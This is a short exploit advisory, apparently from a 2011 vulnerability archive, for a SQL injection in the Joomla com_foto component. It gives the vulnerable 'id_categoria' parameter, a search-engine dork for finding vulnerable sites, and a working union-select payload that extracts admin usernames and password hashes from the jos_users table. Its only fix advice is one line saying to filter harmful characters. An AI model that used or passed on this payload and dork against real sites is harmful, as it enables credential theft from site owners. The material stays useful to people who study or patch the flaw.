The Joomla Foto component suffers from a remote SQL injection vulnerability.
ffd41e5ccdbd099217c0cd9399df69de8c48c5aeca3bb7f6805989abd42b2717
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_foto SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 18.06.2011
# Name : Joomla com_foto
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_foto&task=categoria&id_categoria=[EXPLOIT]
[+] Dork:inurl:"com_foto"
[+] Demo: http://site/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################